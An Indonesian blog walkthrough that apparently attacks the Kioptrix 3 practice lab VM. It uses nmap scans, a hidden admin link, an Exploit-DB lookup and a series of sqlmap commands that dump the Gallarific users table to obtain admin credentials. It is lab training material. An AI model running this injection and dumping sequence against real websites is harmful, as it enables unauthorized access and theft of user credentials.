Ok, langsung saja ke tutorial.
Preparation:
- Nmap (bisa di dapatkan di sini)
- Internet browser (kali ini saya menggunakan chromium)
- Exploit db (bisa ditemukan di sini
- SQLmap (bisa didapatkan di sini)
Catatan:
- Semua tools ini bisa di dapatkan di <<back|track 5
- Untuk internet browser, kamu bisa menggunakan browser apapun.
- Dalam tutorial ini saya menggunakan OS <<back|track 5 GNOME 32 BIT
Briefing:
- Mapping Local Area Network
- Cari tau url halaman login
- Gunakan Exploit-db untuk mencari vulnerability website tersebut
- Gunakan SQLmap untuk melakukan proses SQL injection
- Game over
Buka terminal, kemudian masukan perintah:
root@red-dragon:~# nmap -sn 192.168.1.0/24
Tetapkan target (kali ini target adalah kioptrix3.com
root@red-dragon:~# nmap -A 192.168.1.7
2. Cari tau url halaman login
Buka browser, kemudian tuju kioptrix3.com
Kemudian arahkan browser menuju kioptrix3.com/gallery/
Lihat source pada page tersebut, dan cari <!-- <a href="gadmin">Admin</a> -->
Mari kita coba, apakah halaman ini tersedia jika saya menambahkan "gadmin" (tanpa tanda petik).
Walaaaaa.. Saya berhasil mendapatkan halaman Log-In =)
3. Gunakan Exploit-db untuk mencari vulnerability website tersebut
Terlihat bahwa korban menggunakan Gallarific sebagai gallery managernya. Mari kita cari tau vulnerability yang dimiliki oleh gallarific.
Buka terminal, lalu masukan perintah:
root@red-dragon:~# cd /pentest/exploits/exploitdb/
kemudian
root@red-dragon:/pentest/exploits/exploitdb# grep -i gallarific files.csv
Ada 3 vulnerability yang dimikili oleh gallarific, kita akan mengambil fulnerability yang ke tiga. Yaitu "GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection". Masukan perintah:
root@red-dragon:/pentest/exploits/exploitdb# cat platforms/php/webapps/15891.txt
Terlihat bahwa target kita memiliki kelemahan pada url www.site.com/gallery.php?id=null
4. Gunakan SQLmap untuk melakukan proses SQL injection
Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.
Buka terminal, lalu ketik:
root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/
Penggunaan SQLmap tergolong mudah, formatnya adalah
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]
Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null
Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null --dbs
Output:
Ada 3 database di sini:
- gallery
- information_schema
- mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table
Output:
Ada 7 table yang terdapat pada database gallery:
- dev_accounts
- gallarific_comments
- gallarific_galleries
- gallarific_photos
- gallarific_settings
- gallarific_stat
- gallarific_users
Kemudian saya mencoba membongkar isi table pada gallarific_users. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump
Banzaaaaaaaaai \(^o^)/
Kita sudak dapat user name dan password. Sekarang coba kita test. Dengan user name = admin, password = n0t7t1k4
Sekarang saya bisa melakukan apapun dengan website ini
Created by:
red-dragon
Thanks to : Yoshephine Handini for calm me down this morning.
0 comment:
Post a Comment